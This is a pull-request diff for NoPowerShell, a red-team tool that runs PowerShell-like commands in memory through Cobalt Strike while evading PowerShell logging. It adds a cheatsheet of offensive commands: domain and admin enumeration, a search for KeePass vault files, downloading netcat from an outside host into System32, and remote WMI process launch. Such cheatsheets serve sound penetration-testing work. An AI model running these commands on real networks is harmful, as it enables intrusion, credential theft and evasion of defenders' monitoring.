Merge pull request #2 from bitsadmin/dev

Release v1.23

CHEATSHEET.md

@@ -0,0 +1,70 @@
+# Cheatsheet
+Cheatsheet of offensive PowerShell commands that are supported by NoPowerShell.
+
+| Action | Command | Notes |
+| - | - | - |
+| List all commands supported by NoPowerShell | `Get-Command` | |
+| Get help for a command | `Get-Help -Name Get-Process` | Alternative: `man ps` |
+| Show current user | `whoami` | Unofficial command |
+| List SMB shares of MyServer | `Get-RemoteSmbShare \\MyServer` | Unofficial command |
+| List all user groups in domain | `Get-ADGroup -Filter *` | |
+| List all administrative groups in domain | `Get-ADGroup -LDAPFilter "(admincount=1)" \| select Name` | |
+| List all properties of the Administrator domain user | `Get-ADUser -Identity Administrator -Properties *` | |
+| List all Administrative users in domain | `Get-ADUser -LDAPFilter "(admincount=1)"` | |
+| List all users in domain | `Get-ADUser -Filter *` | |
+| List specific attributes of user | `Get-ADUser Administrator -Properties SamAccountName,ObjectSID` | |
+| Show information about the current system | `Get-ComputerInfo` | |
+| List all processes containing PowerShell in the process name | `Get-Process \| ? Name -Like *PowerShell*` | |
+| List all active local users | `Get-LocalUser \| ? Disabled -EQ False` | |
+| List all local groups | `Get-LocalGroup` | |
+| List details of a specific group | `Get-LocalGroup Administrators` | |
+| List all active members of the Administrators group | `Get-LocalGroupMember -Group Administrators \| ? Disabled -eq False` | |
+| List all local users | `Get-LocalUser` | |
+| List details of a specific user | `Get-LocalUser Administrator` | |
+| List all properties of the DC01 domain computer | `Get-ADComputer -Identity DC01 -Properties *` | |
+| List all Domain Controllers | `Get-ADComputer -LDAPFilter "(msDFSR-ComputerReferenceBL=*)"` | |
+| List all computers in domain | `Get-ADComputer -Filter *` | |
+| List specific attributes of user | `Get-ADComputer DC01 -Properties Name,operatingSystem` | |
+| Copy file from one location to another | `copy C:\Tmp\nc.exe C:\Windows\System32\nc.exe` | |
+| Copy folder | `copy C:\Tmp\MyFolder C:\Tmp\MyFolderBackup` | |
+| Locate KeePass files in the C:\Users\ directory | `ls -Recurse -Force C:\Users\ -Include *.kdbx` | |
+| List the keys under the SOFTWARE key in the registry | `ls HKLM:\SOFTWARE` | |
+| View contents of a file | `Get-Content C:\Windows\WindowsUpdate.log` | |
+| List autoruns in the registry | `Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run \| ft` | |
+| List processes | `Get-Process` | |
+| List processes on remote host | `Get-Process -ComputerName dc01.corp.local -Username Administrator -Password P4ssw0rd!` | |
+| Gracefully stop processes | `Stop-Process -Id 4512,7241` | |
+| Kill process | `Stop-Process -Force -Id 4512` | |
+| Kill all cmd.exe processes | `Get-Process cmd \| Stop-Process -Force` | |
+| Obtain data of Win32_Process class from a remote system and apply a filter on the output | `gwmi "Select ProcessId,Name,CommandLine From Win32_Process" -ComputerName dc01.corp.local \| ? Name -Like *PowerShell* \| select ProcessId,CommandLine` | Explicit credentials can be specified using the `-Username` and `-Password` parameters |
+| View details about a certain service | `Get-WmiObject -Class Win32_Service -Filter "Name = 'WinRM'"` | |
+| Launch process using WMI | `Invoke-WmiMethod -Class Win32_Process -Name Create "cmd /c calc.exe"` | This can also be done on a remote system |
+| Delete a read-only file | `Remove-Item -Force C:\Tmp\MyFile.txt` | |
+| Recursively delete a folder | `Remove-Item -Recurse C:\Tmp\MyTools\` | |
+| Show all network interfaces | `Get-NetIPAddress -All` | |
+| Show the IP routing table | `Get-NetRoute` | |
+| List ARP cache | `Get-NetNeighbor` | Alternative: `arp` |
+| Send 2 ICMP requests to IP address 1.1.1.1 with half a second of timeout | `Test-NetConnection -Count 2 -Timeout 500 1.1.1.1` | |
+| Perform ping with maximum TTL specified | `ping -TTL 32 1.1.1.1` | |
+| Perform a traceroute with a timeout of 1 second and a maximum of 20 hops | `Test-NetConnection -TraceRoute -Timeout 1000 -Hops 20 google.com` | |
+| Check for open port | `tnc bitsadm.in -Port 80` | |
+| List network shares on the local machine that are exposed to the network | `Get-SmbMapping` | |
+| Format output as a list | `Get-LocalUser \| fl` | |
+| Format output as a list showing only specific attributes | `Get-LocalUser \| fl Name,Description` | |
+| Format output as a table | `Get-Process \| ft` | |
+| Format output as a table showing only specific attributes | `Get-Process \| ft ProcessId,Name` | |
+| Download file from the Internet | `wget http://myserver.me/nc.exe` | When compiled using .NET 2 only supports SSL up to SSLv3 (no TLS 1.1+) |
+| Download file from the Internet specifying the destination | `wget http://myserver.me/nc.exe -OutFile C:\Tmp\netcat.exe` | |
+| Count number of results | `Get-Process \| measure` | |
+| Count number of lines in file | `gc C:\Windows\WindowsUpdate.log \| measure` | |
+| Show only the Name in a file listing | `ls C:\ \| select Name` | |
+| Show first 10 results of file listing | `ls C:\Windows\System32 -Include *.exe \| select -First 10 Name,Length` | |
+| List all members of the "Domain Admins" group | `Get-ADGroupMember "Domain Admins"` | |
+| Resolve domain name | `Resolve-DnsName microsoft.com` | Alternatives: `host linux.org`, `Resolve-DnsName -Type MX pm.me` |
+| List local shares | `Get-WmiObject -Namespace ROOT\CIMV2 -Query "Select * From Win32_Share Where Name LIKE '%$'"` | Alternative: `gwmi -Class Win32_Share -Filter "Name LIKE '%$'"` |
+| Show network interfaces | `Get-NetIPAddress` | Alternatives: `ipconfig`, `ifconfig` |
+| Show computer information | `Get-ComputerInfo` | Alternative: `systeminfo` |
+| List installed hotfixes | `Get-HotFix` | The output of this cmdlet together with the output of the `Get-ComputerInfo` cmdlet can be provided to [WES-NG](https://github.com/bitsadmin/wesng/) to determine missing patches |
+| List local drives | `Get-PSDrive` | |
+| Compress folder to zip | `Compress-Archive -Path C:\MyFolder -DestinationPath C:\MyFolder.zip` | Only available when compiled against .NET 4.5+ |
+| Extract zip | `Expand-Archive -Path C:\MyArchive.zip -DestinationPath C:\Extracted` | Alternative: `unzip C:\MyArchive.zip`. Only available when compiled against .NET 4.5+ |

CONTRIBUTING.md

@@ -1,8 +1,9 @@
 # Contributing 
 
 Add your own cmdlets by submitting a pull request.
-## Requirement
+## Aim
 - Maintain .NET 2.0 compatibility in order to support the broadest range of operating systems
+- In case for whatever reason .NET 2.0 compatibility is not possible, add the `#if` preprocessor directive to the class specifying the unsupported .NET versions (for examples check the `*-Archive` cmdlets)
 
 ## Instructions
 Use the TemplateCommand.cs file in the Commands folder to construct new cmdlets. The TemplateCommand cmdlet is hidden from the list of available cmdlets, but can be called in order to understand its workings. This command looks as follows: `Get-TemplateCommand [-MyFlag] -MyInteger [Int32] -MyString [Value]` and is also accessible via alias `gtc`.
@@ -22,7 +23,7 @@ Execute the following steps to implement your own cmdlet:
 1. Download Visual Studio Community from https://visualstudio.microsoft.com/downloads/
     * In the installer select the **.NET desktop development** component.
     * From this component no optional modules are required for developing NoPowerShell modules.
-2. Make sure to have the .NET 2 framework installed: OptionalFeatures -> '.NET Framework 3.5 (includes .NET 2.0 and 3.0)'.
+2. Make sure to have the .NET 2 framework installed: `OptionalFeatures.exe` -> '.NET Framework 3.5 (includes .NET 2.0 and 3.0)'.
 3. Clone this repository and create a copy of the **TemplateCommand.cs** file.
     * In case you are implementing a native PowerShell command, place it in folder the corresponding to the _Source_ attribute when executing in PowerShell: `Get-Command My-Commandlet`.
         * Moreover, use the name of the _Source_ attribute in the command's namespace.

README.md

@@ -1,9 +1,9 @@
 # NoPowerShell
 NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No `System.Management.Automation.dll` is used; only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: `rundll32 NoPowerShell.dll,main`.
 
-Moreover, this project makes it easy for everyone to extend its functionality using only a few lines of C# code.
+This project makes it easy for everyone to extend its functionality using only a few lines of C# code. For more info, see [CONTRIBUTING.md](https://github.com/bitsadmin/nopowershell/blob/master/CONTRIBUTING.md).
 
-Latest binaries available from the [Releases](https://github.com/bitsadmin/nopowershell/releases) page.
+Latest binaries available from the [Releases](https://github.com/bitsadmin/nopowershell/releases) page. Bleeding edge code available in the [DEV](https://github.com/bitsadmin/nopowershell/tree/dev) branch. To kickstart your NoPowerShell skills, make sure to also check out the cmdlet [Cheatsheet](https://github.com/bitsadmin/nopowershell/blob/master/CHEATSHEET.md).
 
 # Screenshots
 ## Running in Cobalt Strike
@@ -13,79 +13,23 @@ Latest binaries available from the [Releases](https://github.com/bitsadmin/nopow
 ## Rundll32 version
 ![NoPowerShellDll via rundll32](https://raw.githubusercontent.com/bitsadmin/nopowershell/master/Pictures/NoPowerShellDll.png "NoPowerShellDll via rundll32")
 
-# Usage
-## Note
-When using NoPowerShell from cmd.exe or PowerShell, you need to escape the pipe character (`|`) with respectively a caret (`^`) or a backtick (`` ` ``), i.e.:
-
-- cmd.exe: `ls ^| select Name`
-- PowerShell: ```ls `| select Name```
+# Why NoPowerShell
+NoPowerShell is developed to be used with the `execute-assembly` command of Cobalt Strike.
+Reasons to use NoPowerShell:
+- Executes pretty stealthy
+- Powerful functionality
+- Provides the cmdlets you are already familiar with in PowerShell, so no need to learn yet another tool
+- If you are not yet very familiar with PowerShell, the cmd.exe aliases are available as well (i.e. `ping` instead of `Test-NetConnection`)
+- In case via `powerpick` or `powershell` cmdlets are not available, they _are_ available in `nps` (i.e. cmdlets from the ActiveDirectory module)
+- Easily extensible with only a few lines of C#
 
+# Usage
 ## Examples
-| Action | Command | Notes |
-| - | - | - |
-| List all commands supported by NoPowerShell | `Get-Command` | |
-| Get help for a command | `Get-Help -Name Get-Process` | Alternative: `man ps` |
-| Show current user | `whoami` | Unofficial command |
-| List SMB shares of MyServer | `Get-RemoteSmbShare \\MyServer` | Unofficial command |
-| List all user groups in domain | `Get-ADGroup -Filter *` | |
-| List all administrative groups in domain | `Get-ADGroup -LDAPFilter "(admincount=1)" \| select Name` | |
-| List all properties of the Administrator domain user | `Get-ADUser -Identity Administrator -Properties *` | |
-| List all Administrative users in domain | `Get-ADUser -LDAPFilter "(admincount=1)"` | |
-| List all users in domain | `Get-ADUser -Filter *` | |
-| List specific attributes of user | `Get-ADUser Administrator -Properties SamAccountName,ObjectSID` | |
-| Show information about the current system | `Get-ComputerInfo` | |
-| List all processes containing PowerShell in the process name | `Get-Process \| ? Name -Like *PowerShell*` | |
-| List all active local users | `Get-LocalUser \| ? Disabled -EQ False` | |
-| List all local groups | `Get-LocalGroup` | |
-| List details of a specific group | `Get-LocalGroup Administrators` | |
-| List all active members of the Administrators group | `Get-LocalGroupMember -Group Administrators \| ? Disabled -eq False` | |
-| List all local users | `Get-LocalUser` | |
-| List details of a specific user | `Get-LocalUser Administrator` | |
-| List all properties of the DC01 domain computer | `Get-ADComputer -Identity DC01 -Properties *` | |
-| List all Domain Controllers | `Get-ADComputer -LDAPFilter "(msDFSR-ComputerReferenceBL=*)"` | |
-| List all computers in domain | `Get-ADComputer -Filter *` | |
-| List specific attributes of user | `Get-ADComputer DC01 -Properties Name,operatingSystem` | |
-| Copy file from one location to another | `copy C:\Tmp\nc.exe C:\Windows\System32\nc.exe` | |
-| Copy folder | `copy C:\Tmp\MyFolder C:\Tmp\MyFolderBackup` | |
-| Locate KeePass files in the C:\Users\ directory | `ls -Recurse -Force C:\Users\ -Include *.kdbx` | |
-| List the keys under the SOFTWARE key in the registry | `ls HKLM:\SOFTWARE` | |
-| View contents of a file | `Get-Content C:\Windows\WindowsUpdate.log` | |
-| List autoruns in the registry | `Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run \| ft` | |
-| List processes | `Get-Process` | |
-| List processes on remote host | `Get-Process -ComputerName dc01.corp.local -Username Administrator -Password P4ssw0rd!` | |
-| Gracefully stop processes | `Stop-Process -Id 4512,7241` | |
-| Kill process | `Stop-Process -Force -Id 4512` | |
-| Kill all cmd.exe processes | `Get-Process cmd \| Stop-Process -Force` | |
-| Obtain data of Win32_Process class from a remote system and apply a filter on the output | `gwmi "Select ProcessId,Name,CommandLine From Win32_Process" -ComputerName dc01.corp.local \| ? Name -Like *PowerShell* \| select ProcessId,CommandLine` | Explicit credentials can be specified using the `-Username` and `-Password` parameters |
-| View details about a certain service | `Get-WmiObject -Class Win32_Service -Filter "Name = 'WinRM'"` | |
-| Launch process using WMI | `Invoke-WmiMethod -Class Win32_Process -Name Create "cmd /c calc.exe"` | This can also be done on a remote system |
-| Delete a read-only file | `Remove-Item -Force C:\Tmp\MyFile.txt` | |
-| Recursively delete a folder | `Remove-Item -Recurse C:\Tmp\MyTools\` | |
-| Show all network interfaces | `Get-NetIPAddress -All` | |
-| Show the IP routing table | `Get-NetRoute` | |
-| Send 2 ICMP requests to IP address 1.1.1.1 with half a second of timeout | `Test-NetConnection -Count 2 -Timeout 500 1.1.1.1` | |
-| Perform a traceroute with a timeout of 1 second and a maximum of 20 hops | `Test-NetConnection -TraceRoute -Timeout 1000 -Hops 20 google.com` | |
-| List network shares on the local machine that are exposed to the network | `Get-SmbMapping` | |
-| Format output as a list | `Get-LocalUser \| fl` | |
-| Format output as a list showing only specific attributes | `Get-LocalUser \| fl Name,Description` | |
-| Format output as a table | `Get-Process \| ft` | |
-| Format output as a table showing only specific attributes | `Get-Process \| ft ProcessId,Name` | |
-| Download file from the Internet | `wget http://myserver.me/nc.exe` | When compiled using .NET 2 only supports SSL up to SSLv3 (no TLS 1.1+) |
-| Download file from the Internet specifying the destination | `wget http://myserver.me/nc.exe -OutFile C:\Tmp\netcat.exe` | |
-| Count number of results | `Get-Process \| measure` | |
-| Count number of lines in file | `gc C:\Windows\WindowsUpdate.log \| measure` | |
-| Show only the Name in a file listing | `ls C:\ \| select Name` | |
-| Show first 10 results of file listing | `ls C:\Windows\System32 -Include *.exe \| select -First 10 Name,Length` | |
-| List all members of the "Domain Admins" group | `Get-ADGroupMember "Domain Admins"` | |
-| Resolve domain name | `Resolve-DnsName microsoft.com` | Alternatives: `host linux.org`, `Resolve-DnsName -Type MX pm.me` |
-| List local shares | `Get-WmiObject -Namespace ROOT\CIMV2 -Query "Select * From Win32_Share Where Name LIKE '%$'"` | Alternative: `gwmi -Class Win32_Share -Filter "Name LIKE '%$'"` |
-| Show network interfaces | `Get-NetIPAddress` | Alternatives: `ipconfig`, `ifconfig` |
-| Show computer information | `Get-ComputerInfo` | Alternative: `systeminfo` |
-| List installed hotfixes | `Get-HotFix` | The output of this cmdlet together with the output of the `Get-SystemInfo` cmdlet can be provided to [WES-NG](https://github.com/bitsadmin/wesng/) to determine missing patches |
+See [CHEATSHEET.md](https://github.com/bitsadmin/nopowershell/blob/master/CHEATSHEET.md).
 
 ## Install in Cobalt Strike
-1. Copy both NoPowerShell.exe and NoPowerShell.cna to the **scripts** subfolder of Cobalt Strike
-2. Launch Cobalt Strike and load the .cna script in the Script Manager
+1. Copy both `NoPowerShell.exe` and `NoPowerShell.cna` to the **scripts** subfolder of Cobalt Strike
+2. Launch Cobalt Strike and load the `NoPowerShell.cna` script in the Script Manager
 3. Interact with a beacon and execute commands using the `nps` command
 
 ## Launch via rundll32
@@ -94,6 +38,12 @@ When using NoPowerShell from cmd.exe or PowerShell, you need to escape the pipe
 3. The shortcut will now look like `rundll32 C:\Path\to\NoPowerShell.dll,main`
 4. Double click the shortcut
 
+## Note
+When using NoPowerShell from cmd.exe or PowerShell, you need to escape the pipe character (`|`) with respectively a caret (`^`) or a backtick (`` ` ``), i.e.:
+
+- cmd.exe: `ls ^| select Name`
+- PowerShell: ```ls `| select Name```
+
 # Known issues
 - Pipeline characters need to surrounded by spaces
 - TLS 1.1+ is not supported by .NET Framework 2, so any site enforcing it will result in a connection error
@@ -105,9 +55,6 @@ When using NoPowerShell from cmd.exe or PowerShell, you need to escape the pipe
 - Add support for ArrayArgument parameter
 - Add support for .NET code in commandline, i.e.: `[System.Security.Principal.WindowsIdentity]::GetCurrent().Name`
 
-# Contributing
-See [CONTRIBUTING.md](https://github.com/bitsadmin/nopowershell/blob/master/CONTRIBUTING.md).
-
 # Requested NoPowerShell cmdlets
 | Cmdlet | Description |
 | - | - |
@@ -133,6 +80,8 @@ Authors of additional NoPowerShell cmdlets are added to the table below. Moreove
 | Get-ADGroupMember | ActiveDirectory | |
 | Get-ADUser | ActiveDirectory | |
 | Get-ADComputer | ActiveDirectory | |
+| Compress-Archive | Archive | Requires .NET 4.5+ |
+| Expand-Archive | Archive | Requires .NET 4.5+ |
 | Get-Whoami | Additional | whoami.exe /ALL is not implemented yet |
 | Get-RemoteSmbShare | Additional | |
 | Get-Command | Core | |
@@ -148,6 +97,7 @@ Authors of additional NoPowerShell cmdlets are added to the table below. Moreove
 | Get-ItemProperty | Management | |
 | Get-Process | Management | |
 | Stop-Process | Management | |
+| Get-PSDrive | Management | |
 | Get-WmiObject | Management | |
 | Get-HotFix| Management | |
 | Invoke-WmiMethod | Management | Quick & dirty implementation |
@@ -156,11 +106,23 @@ Authors of additional NoPowerShell cmdlets are added to the table below. Moreove
 | Get-NetIPAddress | NetTCPIP | |
 | Get-NetRoute | NetTCPIP | |
 | Test-NetConnection | NetTCPIP | |
+| Get-NetNeighbor | NetTCPIP | No support for IPv6 yet |
 | Get-SmbMapping | SmbShare | |
 | Format-List | Utility | |
 | Format-Table | Utility | |
 | Invoke-WebRequest | Utility |
 | Measure-Object | Utility |
 | Select-Object | Utility |
 
-**Authored by Arris Huijgen ([@bitsadmin](https://twitter.com/bitsadmin/) - https://github.com/bitsadmin/)**
+# Acknowledgements
+Various NoPowerShell cmdlets and NoPowerShell DLL include code created by other developers.
+
+| Who | Website | Notes |
+| - | - | - |
+| Contributors of pinvoke.net | https://www.pinvoke.net/ | Various cmdlets use snippets from pinvoke |
+| Michael Conrad | https://github.com/MichaCo/ | Parts of the Resolve-Dns cmdlet are based on the code of the DnsClient.Net project |
+| Rex Logan | https://stackoverflow.com/a/1148861 | Most code of the Get-NetNeighbor cmdlet originates from his StackOverflow post |
+| PowerShell developers | https://github.com/PowerShell/ | Code of NoPowerShell DLL is largely based on the code handling the console input of PowerShell |
+
+
+**Authored by Arris Huijgen ([@bitsadmin](https://twitter.com/bitsadmin/) - https://github.com/bitsadmin/)**